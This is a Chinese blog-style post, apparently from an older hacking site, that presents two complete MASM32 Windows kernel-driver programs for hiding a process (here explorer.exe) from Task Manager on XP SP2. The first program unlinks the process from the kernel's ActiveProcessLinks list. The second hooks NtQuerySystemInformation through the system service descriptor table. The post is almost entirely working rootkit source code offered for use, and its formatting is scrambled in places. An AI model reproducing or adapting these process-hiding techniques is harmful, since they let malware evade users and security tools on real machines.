C++ code colored by C++2HTML
作者:dge

进程隐藏的两种方法
这两种都是很古老的方法,因为无聊,所以写了一下。代码在XP_SP2下调试通过.

(
1).从活动进程链表(ActiveProcessLinks)中摘除自身,这种方法可以欺骗任务管理器,
下面这个程序做的就是双向链表的删除节点和插入节点,十分的简单。

;f:\masm32\bin\ml /nologo /c /coff HideProcess_ActiveProcessLinks.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:HideProcess_ActiveProcessLinks.sys /subsystem:native HideProcess_ActiveProcessLinks.obj
.386 .model flat, stdcall
option casemap
:none ;---------------------------------------------------------------------------------------------------- ; I N C L U D E F I L E S ;---------------------------------------------------------------------------------------------------- include f:\masm32\include\w2k\ntstatus.inc include f:\masm32\include\w2k\ntddk.inc include f:\masm32\include\w2k\ntoskrnl.inc include f:\masm32\include\w2k\w2kundoc.inc includelib f:\masm32\lib\w2k\ntoskrnl.lib include f:\masm32\Macros\Strings.mac

_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP ;---------------------------------------------------------------------------------------------------- ; C O N S T A N T S ;---------------------------------------------------------------------------------------------------- .const CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4 CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4

.
data szHide db 'explorer.exe',0 Flink dd ? Blink dd ?
Explorer dd ? ;---------------------------------------------------------------------------------------------------- ; C O D E ;---------------------------------------------------------------------------------------------------- .code DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING local status:NTSTATUS local pDeviceObject:PDEVICE_OBJECT local dwId,lpEprocess local ListOffset,NameOffset local IdOffset local Version ; int 3 ; invoke DbgPrint,$CTA0("\n\nEntry DriverEntry\n\n") mov status,STATUS_DEVICE_CONFIGURATION_ERROR invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject .if eax==STATUS_SUCCESS mov eax,pDriverObject assume eax:ptr DRIVER_OBJECT mov [eax].DriverUnload, offset _DriverUnload assume eax:nothing ;获得得系统版本 invoke PsGetVersion,NULL,addr Version,NULL,NULL
mov
eax,Version cmp eax,0 jne l1 mov ListOffset,0A0h mov NameOffset,1fch jmp l2
l1: cmp eax,1 jne exit mov ListOffset,88h mov NameOffset,174h
l2: invoke PsGetCurrentProcessId mov dwId,eax invoke PsLookupProcessByProcessId,dwId,addr lpEprocess mov esi,lpEprocess add esi,ListOffset mov edi,esi assume edi:PLIST_ENTRY assume esi:PLIST_ENTRY
l3: mov edx,[esi].Flink
;比较是否为最后一个EPROCESS
cmp edx,edi
je
l4 assume esi:nothing
sub
esi,ListOffset add esi,NameOffset invoke strcmp,esi,addr szHide .if eax == 0 sub esi,NameOffset
add
esi,ListOffset
mov
Explorer,esi assume esi:PLIST_ENTRY
assume
ebx:PLIST_ENTRY
assume
eax:PLIST_ENTRY
;删除节点
mov eax,[esi].Flink
mov
ebx,[esi].Blink mov [ebx].Flink,eax mov [eax].Blink,ebx
mov
Flink,eax mov Blink,ebx assume eax:nothing
assume
ebx:nothing

invoke
DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n") jmp l4 .endif ;恢复EPROCESS指针 sub esi,NameOffset
add
esi,ListOffset
assume
esi:PLIST_ENTRY
mov
esi,[esi].Flink jmp l3
l4:
assume
esi:nothing
assume
edi:nothing
mov
status,STATUS_SUCCESS
exit:
.
endif
mov
eax,status ret mov eax,STATUS_DEVICE_CONFIGURATION_ERROR ret DriverEntry endp ;---------------------------------------------------------------------------------------------------- ; D R I V E R U N L O A D ;---------------------------------------------------------------------------------------------------- _DriverUnload proc pDriverObject:PDRIVER_OBJECT ; int 3 ; invoke DbgPrint,$CTA0("\n\nEntry DriverUnload\n\n") pushad

mov
eax,Flink mov ebx,Explorer assume ebx:PLIST_ENTRY
assume
eax:PLIST_ENTRY
;恢复被摘除的节点
mov [eax].Blink,ebx
mov
[ebx].Flink,eax mov eax,Blink mov [eax].Flink,ebx mov [ebx].Blink,eax popad ;清除符号连接 invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
mov
eax, pDriverObject
;删除在初始化创建的设备
invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject ret _DriverUnload endp ;---------------------------------------------------------------------------------------------------- ; E N D ;----------------------------------------------------------------------------------------------------
end
DriverEntry

2.如果你反汇编taskmgr.exe,可以在发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为,从而实现在任务管理器中隐藏进程的目的,下面就是实现代码。 ;f:\masm32\bin\ml /nologo /c /coff hook_NtQuerySystemInformation.asm ;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:hook_NtQuerySystemInformation.sys /subsystem:native hook_NtQuerySystemInformation.obj .386 .model flat, stdcall
option casemap
:none ;---------------------------------------------------------------------------------------------------- ; I N C L U D E F I L E S ;---------------------------------------------------------------------------------------------------- include f:\masm32\include\w2k\ntstatus.inc include f:\masm32\include\w2k\ntddk.inc include f:\masm32\include\w2k\native.inc include f:\masm32\include\w2k\ntoskrnl.inc includelib f:\masm32\lib\w2k\ntoskrnl.lib include f:\masm32\Macros\Strings.mac ;---------------------------------------------------------------------------------------------------- ; D A T A ;---------------------------------------------------------------------------------------------------- .data ;保存地址 dwOldNtQuerySystemInformation dd ? dwAddr dd ? ;---------------------------------------------------------------------------------------------------- ; C O N S T A N T S ;---------------------------------------------------------------------------------------------------- .const CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4 CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4 CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4 ;---------------------------------------------------------------------------------------------------- ; C O D E ;---------------------------------------------------------------------------------------------------- .code NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return pushad test eax,eax jnz exit .if SysInfoClass == SystemProcessesAndThreadsInformation mov esi,lpSysInfo mov ebx,esi add esi,[esi]

@@: add esi,38h ;在38h偏移处取得进程名字。
invoke RtlCompareUnicodeString,addr processname, esi, 1 .if eax== 0 invoke DbgPrint, $CTA0("\nsuccessful \n")
.
if dword ptr[esi-38h] == 0 mov dword ptr[ebx],0 jmp exit .else
sub
esi,38h mov edx,[esi] add [ebx],edx add esi,[esi] jmp @B .endif .else
sub
esi,38h cmp dword ptr[esi],0 jz exit mov ebx,esi add esi,[esi] jmp @B .endif
.
endif exit: popad

ret


NewNtQuerySystemInformation endp ;---------------------------------------------------------------------------------------------------- ; H O O K F U N C ;---------------------------------------------------------------------------------------------------- HookFunction proc

pushad
; int 3 ; invoke DbgPrint, $CTA0("\nEntry into hoookfunction\n") ;下面是用KeServiceDescriptorTabled导出符号获得数组的基地址,这个数组中包含有NtXXXX函数的入口地址。 mov eax, [KeServiceDescriptorTable] mov esi, [eax] mov esi, [esi] ;下面五句为获取ZwQuerySystemInformation的地址 mov eax,ZwQuerySystemInformation inc eax inc eax mov eax,[eax] mov eax,[eax] inc eax movzx ecx,byte ptr[eax] sal ecx,2
add
esi,ecx mov dwAddr,esi
mov
edi,dword ptr[esi] ;保存旧的函数地址。 mov dwOldNtQuerySystemInformation,edi mov edi,offset NewNtQuerySystemInformation ;修改入口地址 cli
mov
dword ptr[esi],edi sti popad mov eax, STATUS_SUCCESS ret HookFunction endp ;---------------------------------------------------------------------------------------------------- ; DriverUnload ;---------------------------------------------------------------------------------------------------- DriverUnload proc pDriverObject:PDRIVER_OBJECT ;必须保存环境,否则后果很严重。在这个函数中恢复被修改的地址。
pushad
; int 3 ; invoke DbgPrint, $CTA0("\nEntry into DriverUnload \n") mov esi,dwAddr mov eax,dwOldNtQuerySystemInformation cli mov dword ptr[esi],eax sti invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName mov eax,pDriverObject invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
popad

ret
DriverUnload endp ;---------------------------------------------------------------------------------------------------- ; D R I V E R E N T R Y ;---------------------------------------------------------------------------------------------------- DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING local status:NTSTATUS local pDeviceObject:PDEVICE_OBJECT ; int 3 ; invoke DbgPrint, $CTA0("\nEntry into DriverEntry\n") mov status, STATUS_DEVICE_CONFIGURATION_ERROR invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject .if eax == STATUS_SUCCESS mov eax, pDriverObject assume eax:ptr DRIVER_OBJECT mov [eax].DriverUnload, offset DriverUnload assume eax:nothing
invoke
HookFunction
mov
status, STATUS_SUCCESS .endif
mov
eax, status ret DriverEntry endp

end
DriverEntry ;---------------------------------------------------------------------------------------------------- ; E N D ;----------------------------------------------------------------------------------------------------